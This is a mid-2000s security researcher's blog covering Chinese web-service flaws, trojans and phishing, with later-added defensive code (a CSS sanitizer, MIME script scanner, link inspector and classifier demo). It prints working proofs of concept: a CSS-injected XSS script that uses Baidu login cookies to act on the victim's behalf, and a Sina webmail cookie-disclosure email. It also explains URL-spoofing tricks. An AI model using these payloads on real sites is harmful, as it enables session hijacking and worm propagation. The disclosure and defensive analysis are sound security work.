
Blog


    July 24

    Baidu Space XSS Vulnerability

    Baidu (Nasdaq: BIDU) launched its blog service, Baidu Space Beta, 10 days ago. It is a blog system with no highlights at all, but I still moved my Chinese blog there for better bandwidth and stability. Here is an XSS vulnerability I found last Friday.

       1. Script injection

    Baidu Space lets users edit the CSS of their spaces freely, but the system does not filter injected scripts out of it. For example, a CSS rule like body { background:url(javascript:alert('hello')); } pops a message box, because Internet Explorer of that era runs a javascript: URL given as a CSS background image. Users can therefore inject arbitrary script into the CSS of their spaces. This is dangerous because attackers can plant a trojan by injecting browser exploits into a space that other users visit.

       2. The XSS attack

    Baidu uses a cookie to tell whether a user is logged on. The cookie's domain is baidu.com, so any script running on any baidu.com host, including a space on hi.baidu.com, can use it: every request the script makes carries the cookie, and Baidu treats those requests as coming from the victim himself. I'll give a PoC below, which adds a friend link to your Friend List as long as you have a Baidu Space and are logged on.

    Here's the link: http://hi.baidu.com/somethingbad

    And here is the code I injected into the CSS of http://hi.baidu.com/somethingbad:

    #header{height:89px;background:url("javascript:document.body.onload = function(){
        /* get an XMLHttpRequest object; IE 5/6 need the ActiveX fallback */
        var req = null;
        if(window.XMLHttpRequest) req = new XMLHttpRequest();
        else if(window.ActiveXObject){
            var msxml = new Array('MSXML2.XMLHTTP.5.0', 'MSXML2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP', 'Microsoft.XMLHTTP');
            for(var i=0;i<msxml.length;i++){try{req = new ActiveXObject(msxml[i]); break;}catch(e){}}
            try{req.overrideMimeType('text/xml')}catch(e){}
        }
        /* fetch the current page; the browser attaches the visitor's baidu.com cookie by itself */
        req.open('get','.',false);
        req.send();
        var s=req.responseText;
        /* the logout link is only rendered for logged-on visitors */
        p=s.indexOf('passport.baidu.com/?logout');
        if(p>0)
        {
            /* the visitor's user name is the path of the first <strong> link */
            p=s.indexOf('<strong>');
            if(p>0)
            {
                p=s.indexOf('/',p);
                /* fromCharCode(34) is a double quote, which cannot be written inside the url("...") string */
                p2=s.indexOf(String.fromCharCode(34),p);
                var user=s.substring(p+1,p2);
                var name='Here is a bad site';
                var link='http://hi.baidu.com/somethingbad';
                var desc='This link was added by an XSS script';
                /* POST the friend-link form on the victim's behalf */
                var url='/'+user+'/commit';
                var data='ct=6&cm=1&spRef='+escape('http://hi.baidu.com/'+user)+'%2Fmodify%2Fbuddylink%2F0&spBuddyName='+escape(name)+'&spBuddyURL='+escape(link)+'&spBuddyIntro='+escape(desc);
                req.open('post',url,false);
                req.send(data);
                alert('A friend link has been added to your space at http://hi.baidu.com/' +user);
            }
        }
        else{alert('You are not a logged Baidu user.');}
    }");
    }
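    The check that was missing on Baidu's side, as an added example (this is not Baidu's code and not part of the original post): a conservative filter for user-supplied CSS. It rejects url() values whose scheme is not http or https, values that IE-era browsers turn into script (expression(), javascript:), properties that load script (behavior, -moz-binding, filter) and at-rules such as @import, after decoding CSS escapes and stripping comments and whitespace so that obfuscated spellings are caught too. The block parser is deliberately crude (one level of braces); the nested braces in the PoC above therefore break the rule into fragments that are all dropped, which fails safe. The sample stylesheets are constructed from the two payloads quoted in the post.

```javascript
// Added example, not Baidu's code: allow-list style filter for user CSS.
const DENIED_PROPERTIES = new Set(['behavior', '-moz-binding', 'filter', '-ms-filter']);
const ALLOWED_URL_SCHEMES = new Set(['http', 'https']);

// Decode \6A-style hex escapes and single-character backslash escapes so the
// checks see the string the browser would see ("java\script:" -> "javascript:").
function decodeCssEscapes(value) {
  return value
    .replace(/\\([0-9a-fA-F]{1,6})\s?/g, (_, hex) => {
      const cp = parseInt(hex, 16);
      return cp === 0 || cp > 0x10ffff ? '\uFFFD' : String.fromCodePoint(cp);
    })
    .replace(/\\(.)/g, '$1');
}

function normaliseValue(value) {
  return decodeCssEscapes(value)
    .replace(/\/\*[\s\S]*?\*\//g, '') // strip CSS comments
    .replace(/\s+/g, '')              // "java script:" -> "javascript:"
    .toLowerCase();
}

// True when a declaration value could execute script or fetch from a
// non-HTTP scheme. An unterminated url( counts as hostile.
function hasDangerousValue(rawValue) {
  const value = normaliseValue(rawValue);
  if (/expression\(|javascript:|vbscript:/.test(value)) return true;
  let pos = value.indexOf('url(');
  while (pos !== -1) {
    const target = value.slice(pos + 4).replace(/^['"]+/, '').split(/[)'"]/)[0];
    const scheme = /^([a-z][a-z0-9+.-]*):/.exec(target);
    // Scheme-less (relative) targets are fine; anything else must be http(s).
    if (scheme && !ALLOWED_URL_SCHEMES.has(scheme[1])) return true;
    pos = value.indexOf('url(', pos + 4);
  }
  return false;
}

// Returns the rules that survived and the declarations that were dropped.
function sanitizeUserCss(css) {
  const kept = [];
  const rejected = [];
  // Drop at-rules outside blocks (@import, @charset). Nested blocks such as
  // @media are flattened to their inner rules by the matcher below.
  const stripped = css.replace(/@[a-z-]+[^;{]*;/gi, '');
  const blockRe = /([^{}]+)\{([^{}]*)\}/g;
  let block;
  while ((block = blockRe.exec(stripped)) !== null) {
    const selector = block[1].trim();
    // A "selector" containing ';', '@' or '\' is the tail of a broken
    // declaration (nested braces, as in the PoC), not a real selector.
    if (!selector || /[;@\\]/.test(selector)) { rejected.push(selector + ' { ... }'); continue; }
    const decls = [];
    for (const decl of block[2].split(';')) {
      if (!decl.trim()) continue;
      const colon = decl.indexOf(':');
      if (colon < 0) { rejected.push(decl.trim()); continue; }
      const prop = decl.slice(0, colon).trim().toLowerCase();
      const value = decl.slice(colon + 1).trim();
      if (!/^-?[a-z][a-z0-9-]*$/.test(prop) || DENIED_PROPERTIES.has(prop) || hasDangerousValue(value)) {
        rejected.push(`${prop}: ${value}`);
      } else {
        decls.push(`${prop}: ${value}`);
      }
    }
    if (decls.length) kept.push(`${selector} { ${decls.join('; ')}; }`);
  }
  return { css: kept.join('\n'), rejected };
}

// Constructed samples: the two payloads from the post plus obfuscated and clean variants.
const SAMPLES = {
  alertPayload: "body { background:url(javascript:alert('hello')); }",
  pocHeader: '#header{height:89px;background:url("javascript:document.body.onload = function(){ alert(1) }");}',
  escaped: 'a { color: red; width: exp\\72 ession(alert(1)); background: url( java\nscript:alert(1) ) }',
  imported: '@import url(http://evil.example/x.css); p { color: blue }',
  clean: '#header { height: 89px; background: url("http://hi.baidu.com/img/bg.png") }',
};

for (const [name, css] of Object.entries(SAMPLES)) {
  console.log(name, JSON.stringify(sanitizeUserCss(css)));
}
```

    Splitting declarations on ';' also breaks data: URLs apart, which is acceptable here because data: is not an allowed scheme anyway; a production filter should use a real CSS parser and an allow-list of properties rather than the deny-list shown.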

       3. Web 2.0 worm opportunity

    The problem is quite similar to the Samy worm on MySpace. A Web 2.0 worm could be built on such an XSS vulnerability: with a slight modification, the code could copy itself into the victim's CSS, and a worm comes into being.

    Baidu responded quickly when its verification-code (CAPTCHA) algorithm was cracked. I hope it does a good job this time too.

    July 13

    Liu Xiang and his New World Record

    Liu Xiang breaks men’s 110m hurdles WR.

    runner_liuxiang

    July 05

    The Month of Browser Bugs

    H D Moore opened the Browser Fun blog on July 2nd. Here is its welcome post,

    This blog will serve as a dumping ground for browser-based security research and vulnerability disclosure. To kick off this blog, we are announcing the Month of Browser Bugs (MoBB), where we will publish a new browser hack, every day, for the entire month of July. The hacks we publish are carefully chosen to demonstrate a concept without disclosing a direct path to remote code execution. Enjoy!

    So far they have published 5 bugs, affecting IE, Firefox and Safari. See the bug list below,

    The blog is really cool, but unfortunately Chinese users cannot access it directly, since the GFW has banned the whole blogspot.com domain. Here are two simple ways to bypass the GFW,

    1. Use a proxy server or a proxy website such as hidemyass, or simply click here.
    June 30

    A Caution to Chinese WoW Players

    One of my colleagues told me he found a suspicious post on MOP's WoW forum last night. All hyperlinks inside the post pointed to the same URL, and when he clicked one, IE stopped responding.

    After studying the source, I found that the links lead users to a malicious site which exploits 6 different critical flaws to install trojans. Here is the list of flaws it misuses,

    • Real Player SMIL file handling buffer overflow (CAN-2005-0455)
    • IE HHCtrl 'Related Topic' cross-zone code execution (MS05-001)
    • IE OBJECT CODEBASE cross-zone code execution (MS02-015)
    • IE MHTML ms-its cross-zone scripting (MS03-014)
    • Windows WMF SetAbortProc code execution (MS06-001)
    • IE createTextRange() buffer overflow (MS06-013)

    Fortunately, vendors have issued patches for all of them.

    The trojans to be installed target 3 popular online games: World of Warcraft, Legend of Mir and Menghuan Xiyou (Fantasy Westward Journey). Around 530 players have read the post in the past 40 hours, and the number is still increasing.

    Do not open the post shown below, and if you already did, run antivirus software with the latest database immediately and change your passwords afterwards.

    MOP_WOW_TROJAN

    June 28

    A Paper on Defeating GFW

    A post on the SecuriTeam Blogs led me to a paper on how to defeat the "Great Firewall" of China. The paper explains how the GFW works and proposes a way to beat it. It is worth reading, and I hope some of you can download the paper before it gets banned.

    Phisher Targets ICBC Accounts

    We received a few variants of a phishing trojan that targets ICBC (Industrial and Commercial Bank of China) accounts. Once launched, the trojan watches the URLs opened in IE and pops up a phishing dialog box when the victim tries to log on to ICBC online banking. We have detected a dozen infections; the real number of victims may be many times that.

    The phishing window, filled with a screenshot of the online bank's web page plus some hoax text, tries to persuade the victim to submit his or her account password. The stolen information is sent to the VXer (virus writer) by email. See the picture below (click it to view a larger one),

    FAKE_ICBC

    Screenshots are one of the most common tricks used by phishing trojans. The trick is easy to notice if the user interacts with controls on the window, e.g. tries to drag a scrollbar: a picture does not respond.

    June 23

    Extortioner Opened Trojan Source

    A few days ago I blogged about a trojan extortioner, Trojan/Agent.bq, which was then widely reported by Chinese media over the past week.

    The trojan author, who hardcoded his bank account, cell phone number and real name into his malware, contacted us through MSN and left evidence of illegal income. As a result, he became more famous for his carelessness. Last night he drew our attention again by posting the viral source code to a public forum. His posts were confirmed to be the source of Trojan/Agent.bq.

    The motivation might come from two aspects. One is to set off an explosion of variants; the other is to protect the VXer himself, since he is no longer the only person who owns the source. Unfortunately, neither is very likely to be achieved. The source was posted to a non-technical forum and stayed online for just 5 to 6 hours in the very early morning. I don't think a variant explosion will really happen unless the source is published again in the right place at the right time. And while the posts were downloaded by almost nobody, they exposed the author's IP address, which will make it easier for the police to locate him.
     
    June 22

    Naked Girl Scores in Soccer Game

    Are you bored with World Cup games played by men? If so, our newly found trojan probably meets your need. The malicious file was named "Naked Girl Playing Soccer". When launched, it plays a 23-second video in which a totally naked girl kicks a 20-yard goal. See the snapshot below,
     
    naked_girl_scores
     
    However, a variant of Backdoor/Huigezi (alias Backdoor.Graybird) is dropped along with the video, and its controller can take complete control over the infected PC. A technical report (in Chinese) has been published on our company's website for those who want more details.
    June 21

    More comments about Yahoo and Sina web services

    A few days ago I was a little worried that the Yamanner worm would encourage hackers to find more vulnerabilities in Yahoo's web services. Now the prediction has come true. A series of proofs of concept was published on the full-disclosure mailing list today. Multiple Yahoo vulnerabilities are involved, including authentication bypass, session binding, a cookie-encoding weakness and cross-site scripting. Yahoo has work to do.

    Sina might have even more work to do, since its webmail security is worse than Yahoo's. I wrote a post discussing Sina webmail's problem a week ago, and one of my friends blogged about it in Chinese too, but nothing has been done to patch the hole. Maybe Sina's coders haven't realized there is a critical authentication bypass flaw inside their webmail system. I hope some Sina engineers will send the mail below to their own webmail accounts, open it in a browser and see what happens,

    Date: Mon, 12 Jun 2006 22:43:11 +0800
    From: "Daishuo" <daishuo@jiangmin.com>
    To: "somebody" <somebody@mail>
    Subject: Cookie disclosure PoC of Sina Webmail
    X-mailer: Foxmail 5.0 [cn]
    Mime-Version: 1.0
    Content-Type: multipart/alternative;
     boundary="=====003_Dragon577540504666_====="


    This is a multi-part message in MIME format.

    --=====003_Dragon577540504666_=====
    Content-Type: text/plain;
     charset="gb2312"
    Content-Transfer-Encoding: 7bit

    this is a test.

    --=====003_Dragon577540504666_=====
    Content-Type: text/html;
     charset="gb2312"
    Content-Transfer-Encoding: 7bit

    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
    <HTML>
    <HEAD></HEAD>
    <BODY>
    <IMG src="http://www.baidu.com/img/logo.gif"
    onload="document.write('<BODY></BODY>');document.body.innerText=document.cookie;"></IMG>
    </BODY></HTML>

    --=====003_Dragon577540504666_=====--

     

    The user's cookie will be displayed in the mail body. Of course the cookie could just as well be submitted to some guy's database. Once we send a GET request to mail.sina.com.cn carrying someone's cookie, we are logged on to his account without ever knowing the password: the session cookie alone is enough, so the authentication is bypassed.
    Sina had better read this post before hackers steal too many user cookies.

     

    June 19

    Microsoft’s Happy Weekend

    Some things happened to Microsoft last weekend; at least two of them are worth a mention here.

    First, a new 0-day vulnerability in Excel was confirmed by MSRC last Saturday. The malicious sample was first reported on June 14, the day after Microsoft's "Patch Tuesday". Technical details are not public. I don't think MS will release an out-of-cycle patch for it, so Excel will probably remain exploitable until July 11. Here are some links about the 0-day,

    Microsoft Excel 0-day Vulnerability FAQ

    Reports of a new vulnerability in Microsoft Excel

    New Excel zero-day flaw used in attacks

    Second, Microsoft France was hacked. See the snapshot below (click it to view the large picture).

    TiTHacK, the hacker, has been really active these days, and Microsoft.com is his or her next target. Is it another 0-day in Win2003 + IIS 6.0? Let's wait and see.

    Google Cache Returns

    Google's cache has been blocked by China for years. Now it seems to have reopened. This is really exciting :) I hope it's not a temporary bug of the GFW.

    June 14

    Never Logon Your Sina Webmail

    As I mentioned in an earlier post, the Yamanner worm puts its code into the 'onload' event handler of img tags. Yahoo has already fixed this.
    We can write an email with the HTML below to test whether a webmail application is vulnerable to the Yamanner exploit,
    <HTML>
    <HEAD></HEAD>
    <BODY>
    <IMG src="http://www.baidu.com/img/logo.gif"
    onload="alert('Scripts Executed!')"></IMG>
    </BODY>
    </HTML>

    I tested Sina webmail. Unfortunately, it is exploitable. Here's the snapshot,
    sina_mail_vul
     
    In fact, Sina does not care about scripts at all. Even script tag blocks are not filtered. In other words, hackers can send malicious scripts to your Sina mail account freely. Forget the antivirus filter; it is damn easy to bypass. Just think about what a bad guy could do after downloading a database of hundreds of thousands of @sina.com addresses.
     
    Never log on to your Sina mail account through the web. That's the best suggestion I can give until Sina fixes its security holes.
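    For both Sina posts above (the cookie-disclosure MIME message of June 21 and the simpler Yamanner test of June 14), here is an added example that is not part of the original posts: it pulls the text/html part out of a raw MIME message, the way a webmail filter would have to, and lists the active-content vectors it contains (script/object/embed/iframe elements, on* event handlers, javascript: URLs). It is a detector for testing a filter, not a sanitizer; rendering untrusted mail needs a real allow-list HTML sanitizer. The message below is constructed for the demo from the PoC in the post.

```javascript
// Added example, not Sina's or Yahoo's code: MIME html-part extraction plus a
// script-vector scan, for testing a webmail filter.

// Constructed from the cookie-disclosure PoC in the post (CRLF line endings as on the wire).
const SAMPLE_MIME = [
  'From: "Daishuo" <daishuo@jiangmin.com>',
  'To: "somebody" <somebody@mail>',
  'Subject: Cookie disclosure PoC of Sina Webmail',
  'Mime-Version: 1.0',
  'Content-Type: multipart/alternative;',
  ' boundary="=====003_Dragon577540504666_====="',
  '',
  'This is a multi-part message in MIME format.',
  '',
  '--=====003_Dragon577540504666_=====',
  'Content-Type: text/plain;',
  ' charset="gb2312"',
  'Content-Transfer-Encoding: 7bit',
  '',
  'this is a test.',
  '',
  '--=====003_Dragon577540504666_=====',
  'Content-Type: text/html;',
  ' charset="gb2312"',
  'Content-Transfer-Encoding: 7bit',
  '',
  '<HTML><HEAD></HEAD><BODY>',
  '<IMG src="http://www.baidu.com/img/logo.gif"',
  'onload="document.write(\'<BODY></BODY>\');document.body.innerText=document.cookie;"></IMG>',
  '</BODY></HTML>',
  '',
  '--=====003_Dragon577540504666_=====--',
].join('\r\n');

// Unfold RFC 2822 continuation lines and return a lower-cased name -> value map.
function parseHeaders(text) {
  const headers = {};
  for (const line of text.replace(/\r?\n[ \t]+/g, ' ').split(/\r?\n/)) {
    const colon = line.indexOf(':');
    if (colon > 0) headers[line.slice(0, colon).trim().toLowerCase()] = line.slice(colon + 1).trim();
  }
  return headers;
}

// Split an entity at its first blank line.
function splitEntity(text) {
  const sep = text.search(/\r?\n\r?\n/);
  if (sep < 0) return { headers: parseHeaders(text), body: '' };
  return { headers: parseHeaders(text.slice(0, sep)), body: text.slice(sep).replace(/^\r?\n\r?\n/, '') };
}

// Return the body of the first text/html part, descending into nested multiparts, or null.
function extractHtmlPart(rawMessage) {
  const { headers, body } = splitEntity(rawMessage);
  const contentType = headers['content-type'] || '';
  if (/^text\/html/i.test(contentType)) return body;
  const boundary = /boundary="?([^";]+)"?/i.exec(contentType);
  if (!boundary) return null;
  // parts[0] is the preamble; a part starting with "--" is the closing delimiter.
  for (const part of body.split('--' + boundary[1]).slice(1)) {
    if (part.startsWith('--')) break;
    const entity = part.replace(/^\r?\n/, '');
    const subType = splitEntity(entity).headers['content-type'] || '';
    if (/^text\/html/i.test(subType)) return splitEntity(entity).body;
    if (/^multipart\//i.test(subType)) {
      const nested = extractHtmlPart(entity);
      if (nested) return nested;
    }
  }
  return null;
}

// List the script vectors in an HTML fragment. Whitespace and control characters
// inside attribute values are removed before the scheme check ("java\nscript:").
function findScriptVectors(html) {
  const findings = [];
  const tagRe = /<([a-zA-Z][a-zA-Z0-9]*)\b([^>]*)>/g;
  const attrRe = /([a-zA-Z_:][-a-zA-Z0-9_:.]*)\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)/g;
  let tag;
  while ((tag = tagRe.exec(html)) !== null) {
    const name = tag[1].toLowerCase();
    if (['script', 'object', 'embed', 'iframe'].includes(name)) findings.push({ tag: name, vector: 'element' });
    attrRe.lastIndex = 0;
    let attr;
    while ((attr = attrRe.exec(tag[2])) !== null) {
      const attrName = attr[1].toLowerCase();
      const value = attr[2].replace(/^["']|["']$/g, '').replace(/[\s\x00-\x1f]/g, '').toLowerCase();
      if (attrName.startsWith('on')) findings.push({ tag: name, vector: attrName });
      else if (/^(javascript|vbscript):/.test(value)) findings.push({ tag: name, vector: `${attrName}=${value.split(':')[0]}:` });
    }
  }
  return findings;
}

console.log(findScriptVectors(extractHtmlPart(SAMPLE_MIME) || ''));
```

    Run against the constructed message, the scan reports the img onload handler that both Yamanner and the Sina PoC rely on; a webmail filter that lets that attribute through fails the same test the post describes.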
    June 12

    Mobile Phones Deleted Harddisk Files?

    The title sounds interesting. I had never met such a weird case, but quite a few Chinese users did in the past 4 days. They found their documents lost, and every time the machine restarted a pop-up text told them that the data loss was caused by high-power energy from mobile phones. However, the text added, the damage could be fixed if the user paid.
    Those missing files were not deleted by mobile phones; they were hidden by a new malware called Trojan/Agent.bq. This trojan reminds me of the GPCode variants that spread badly in Russia. There are 2 main differences between them:
    first, Trojan/Agent.bq does not encrypt user documents. It simply moves them to another place on the hard disk and hides them;
    second, Trojan/Agent.bq targets Chinese users, not Russian.
    What impressed me most was the stupidity of the Trojan/Agent.bq author. He must be dumb to leave his bank account and mobile phone number open to every victim. Good luck to him.

    Yahoo webmail worm

    I just read this post on full-disclosure. Some guy received an email with an HTML attachment in his Yahoo mail account. When he opened the mail, some scripts were executed and the mail was forwarded to some of his contacts automatically.
    A reply led me to a recent response from Symantec: the strange email is a new worm trying to spread through Yahoo webmail.
    I downloaded the viral source and spent some time studying it. The malicious script is placed in the 'onload' event handler of an 'img' tag, and Yahoo seems not to filter this out. The worm targets users in the United States, and a universal version could be made with a few source changes. Yahoo should patch the hole soon, but this might encourage hackers to find more vulnerabilities in Yahoo webmail.
    Anyway, be careful.
    June 09

    Google Spreadsheets

    Google Spreadsheets was released a few days ago. I tried this latest service today. Basically it's a simplified but *online* Excel. I don't think Google Spreadsheets is a threat to desktop Office, but it's a real blow to Microsoft's unborn Office Live.

    Sharing and cooperation through the web is what Google Spreadsheets focuses on. Users can invite people to view or edit their sheets by sending invitation emails. An editor can send messages to the viewer/editor group, and one's modifications are seen by the others instantly. Sharing is the key point that makes Google Spreadsheets different from Microsoft Excel.

    Maybe I will write and share my wedding ceremony schedule using this cool service, so don't be surprised if some of you receive an invitation from me via Google :)

    June 07

    Another trick of Internet Explorer

    Here's an interesting way to bypass DNS resolution in Internet Explorer: a shell shortcut whose name matches the host name typed into the address bar is opened instead, so the name never reaches DNS,

    Step 1: right-click on the Desktop

    Step 2: create a shortcut to notepad.exe

    Step 3: name the shortcut 'www.microsoft.com'

    Step 4: launch Internet Explorer and type 'www.microsoft.com' in the address bar

    More info could be found here.

    Survive the URL Spoofing of IM Worms

    IM (Instant Messaging) worms are malware that send messages through instant messaging applications such as MSN, ICQ, OICQ or AOL Messenger. The messages usually contain URLs that lead receivers to malicious websites.

    URL spoofing is an old trick used frequently by IM worms. Worm.Viking showed it to us again by sending the following URL through OICQ,

    http://www.qq.com.search_2.shtml.cgi-client-entry.photo.39pic.com/qq%E5%83%8F%E5%86%8C4/

    At first sight the address seems to point to some page on www.qq.com. www.qq.com is well known as the official website of OICQ and hence is trusted by users. But the URL actually opens a malformed web page that tries to install the worm on the visitor's machine by exploiting MS05-001 and MS04-013. Look carefully and you'll find that the server name is www.qq.com.search_2.shtml.cgi-client-entry.photo.39pic.com, not www.qq.com: the registrable domain is 39pic.com, and everything in front of it is just labels its owner chose.

    Worm.Viking's spoofing was a success, and helped Viking become the most widespread worm in China last week. This reminded me of 2 other common spoofing tricks used by IM worms.

    The first is to use the redirect scripts of well-known servers. For example, http://www.google.com/url?q=http://www.badguy.com leads to http://www.badguy.com. An equivalent URL with the destination percent-encoded, so that the target is not visible at a glance, is http://www.google.com/%75%72%6C%3F%71%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%62%61%64%67%75%79%2E%63%6F%6D

    The other trick is to put a user name and password in the URL. Look at the example below,

    http://www.google.com:8080@223408EDB32A.08E1F1AC275.CC

    The URL does not connect to port 8080 of www.google.com; instead it connects to 223408EDB32A.08E1F1AC275.CC using 'www.google.com' as the user name and '8080' as the password. Everything before the '@' is credentials, and the real host is whatever follows it.

    Most IM users are cautious not to click strange URLs sent by others, but those that look official and innocent are more dangerous. I hope this post helps people survive the URL spoofing of IM worms.
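    The three tricks above, unwrapped by code, as an added example that is not part of the original post: a link inspector that reports the host a URL really connects to, flags credentials hidden in front of '@', flags hosts that merely begin with a trusted name, and follows a redirect parameter to the final host. It relies on Node's WHATWG URL parser; the trusted-host list and the redirect parameter names are assumptions made for the demo.

```javascript
// Added example, not from the original post: show an IM link as it will really be used.
const TRUSTED_HOSTS = ['www.qq.com', 'www.google.com'];        // assumed for the demo
const REDIRECT_PARAMS = ['q', 'url', 'u', 'redirect', 'goto']; // assumed; google.com/url used "q"

// Crude: the last two labels. A real implementation uses the Public Suffix List.
function registrableDomain(hostname) {
  return hostname.split('.').slice(-2).join('.');
}

function inspectLink(raw) {
  // Percent-decode first so an encoded "/url?q=..." is seen as a redirect. This is
  // deliberately pessimistic: it views the link the way the target server will.
  let decoded = raw;
  try { decoded = decodeURIComponent(raw); } catch (e) { /* malformed %xx: keep raw */ }
  const url = new URL(decoded);
  const host = url.hostname; // already lower-cased by the parser
  const findings = [];

  if (url.username || url.password) {
    findings.push(`"${url.username}" is a user name, not a host; the request goes to ${host}`);
  }
  for (const trusted of TRUSTED_HOSTS) {
    if (host !== trusted && host.startsWith(trusted + '.')) {
      findings.push(`host only begins with ${trusted}; registrable domain is ${registrableDomain(host)}`);
    }
  }
  let redirectTo = null;
  for (const name of REDIRECT_PARAMS) {
    const target = url.searchParams.get(name);
    if (target && /^https?:\/\//i.test(target)) {
      redirectTo = new URL(target).hostname;
      findings.push(`redirects to ${redirectTo}`);
      break;
    }
  }
  return { host, finalHost: redirectTo || host, findings };
}

// The three URLs quoted in the post.
const LINKS = [
  'http://www.qq.com.search_2.shtml.cgi-client-entry.photo.39pic.com/qq%E5%83%8F%E5%86%8C4/',
  'http://www.google.com/%75%72%6C%3F%71%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%62%61%64%67%75%79%2E%63%6F%6D',
  'http://www.google.com:8080@223408EDB32A.08E1F1AC275.CC',
];
for (const link of LINKS) console.log(link, '->', inspectLink(link));
```

    An IM client or gateway that shows `finalHost` next to the link, rather than the raw text, defeats all three tricks at once.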

    June 05

    Counting down to the Devil’s Day

    I heard about the Devil's Day by chance a few months ago. Some Western people believe that devils revive on June 6th of the 6th year of each century, and this century's Devil's Day, June 6th 2006, comes tomorrow.

    It's a marketing chance for entertainment producers, such as 20th Century Fox and its "The Omen". It's also, I believe, a good chance for virus writers to show off their newest malware. Most virus writers love using a meaningful day as the outbreak timer of their viruses: CIH used the author's birthday, April 26, and many viruses trigger on Friday the 13th. The Devil's Day seems rarer and more valuable, since it happens once in a hundred years. It's almost certain that some bad guys are considering themselves awakening devils. We'd better prepare our systems for the coming attacks.

    June 01

    Improvement opportunity of KVDetect

    Brief Introduction

    KVDetect is an application designed to find suspicious executables that might be malware. I developed version 1.0 in February 2005. Colleagues in the R&D department added lots of cool features, such as BHO judgment and anti-rootkit, and the product was finally released as a component of the proactive detection module in our antivirus software KV2005 and later.

    Inside the program

    To detect malware, a knowledge base is necessary. KVDetect's knowledge base consists of two parts: a signature database and a formula database. The signature database is a set of signature records; possible signatures are text strings, code fragments and suspicious behaviours. The engine is responsible for finding the matching result of each signature in the target executable. A formula is an expression used to give the viral probability of the target. Formulas can be any combination of the supported operators and operands; operands are signature matching results, immediate values or the results of other formulas. The engine evaluates every formula and finally arrives at the viral probability.

    The problem

    KVDetect's knowledge base is written entirely by humans. Picking signatures is what virus analysts are good at; the really hard job is to determine good formulas. Before a nice formula was confirmed, we had to spend a few hours redefining operators and coefficients. But no matter how hard we worked, empirical formulas always lack a supporting theory.

    Improvement Opportunity

    A support vector machine (SVM) might be a good solution to our formula problem. In the SVM model we only need to supply signatures and matching results; after the training and refining procedures, a decision module is constructed automatically. bluesky-Leon, who is doing his thesis project at our company, ran some experiments. I provided him with 26 text strings as the signature database and 150 samples of Agobot variants. He used 120 samples to train and refine the SVM, then let the SVM pick out the remaining 30 Agobots from among innocent files. The SVM's accuracy was 100%.

    The test result was really exciting. I believe a much more intelligent version of KVDetect could be implemented on SVM technology. Anyone who has suggestions, feel free to contact me :)
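    A toy version of the two-part knowledge base and of the learned alternative to hand-written formulas, as an added example that is not KVDetect's code: text-string signatures are matched against a sample, and the resulting match vector feeds either a hand-tuned formula (the "formula database" described above) or a decision function learned from labelled samples. The post used an SVM; this demo trains a logistic-regression model instead, because it fits in a few lines, but the workflow is the same one described for the Agobot experiment: train on match vectors of labelled samples, then score held-out samples. All signatures, samples and coefficients are constructed for the demo.

```javascript
// Added example, not KVDetect's code: signature matching + hand formula + learned model.
const SIGNATURES = ['kernel32.dll', 'Copyright', 'irc.', 'PRIVMSG', 'ddos', 'keylog', 'rundll32'];

// Signature matching result: 1 if the string occurs in the sample, else 0.
function matchSignatures(sample) {
  return SIGNATURES.map((sig) => (sample.includes(sig) ? 1 : 0));
}

// A hand-written formula of the kind an analyst tunes by trial and error
// (coefficients constructed for the demo), clamped to a probability.
function handFormula(matches) {
  const [, copyright, irc, privmsg, ddos, keylog] = matches;
  const score = 0.3 * irc + 0.3 * privmsg + 0.4 * ddos + 0.3 * keylog - 0.2 * copyright;
  return Math.min(1, Math.max(0, score));
}

const sigmoid = (z) => 1 / (1 + Math.exp(-z));
const dot = (x, w) => x.reduce((s, xi, j) => s + xi * w[j], 0);

// Batch gradient descent on the logistic loss; the decision function is learned
// from (match vector, label) pairs instead of being written by hand.
function trainLogistic(vectors, labels, steps = 1000, rate = 0.5) {
  const weights = new Array(SIGNATURES.length).fill(0);
  let bias = 0;
  for (let step = 0; step < steps; step++) {
    const gradW = new Array(SIGNATURES.length).fill(0);
    let gradB = 0;
    vectors.forEach((x, i) => {
      const err = sigmoid(bias + dot(x, weights)) - labels[i];
      x.forEach((xi, j) => { gradW[j] += err * xi; });
      gradB += err;
    });
    weights.forEach((_, j) => { weights[j] -= (rate * gradW[j]) / vectors.length; });
    bias -= (rate * gradB) / vectors.length;
  }
  return { weights, bias };
}

function learnedProbability(model, matches) {
  return sigmoid(model.bias + dot(matches, model.weights));
}

// Constructed corpus: strings standing in for the printable strings of executables.
// Label 1 = bot sample, 0 = innocent file.
const TRAINING = [
  ['kernel32.dll irc.evil.example PRIVMSG #bots ddos.syn keylog', 1],
  ['kernel32.dll PRIVMSG NICK bot ddos.udp', 1],
  ['kernel32.dll irc. keylog dump', 1],
  ['kernel32.dll Copyright ddos.http PRIVMSG', 1],
  ['kernel32.dll Copyright (C) Contoso notepad', 0],
  ['kernel32.dll rundll32 Copyright', 0],
  ['kernel32.dll Copyright calc', 0],
  ['kernel32.dll', 0],
];
const HELD_OUT = [
  ['kernel32.dll irc. PRIVMSG ddos', 1],
  ['kernel32.dll Copyright rundll32 shell', 0],
];

// Train on the labelled set, then score the held-out samples with both methods.
function evaluate() {
  const model = trainLogistic(TRAINING.map(([s]) => matchSignatures(s)), TRAINING.map(([, y]) => y));
  return HELD_OUT.map(([sample, label]) => {
    const matches = matchSignatures(sample);
    return { sample, label, hand: handFormula(matches), learned: learnedProbability(model, matches) };
  });
}

console.log(evaluate());
```

    The learned weights end up positive for the strings that only bot samples contain and negative for the ones shared with innocent files, which is exactly the coefficient tuning the post describes doing by hand for hours; with real SVM training the decision boundary is chosen with a maximum-margin criterion instead of gradient descent on the logistic loss, but the inputs and outputs are the same match vectors and probabilities.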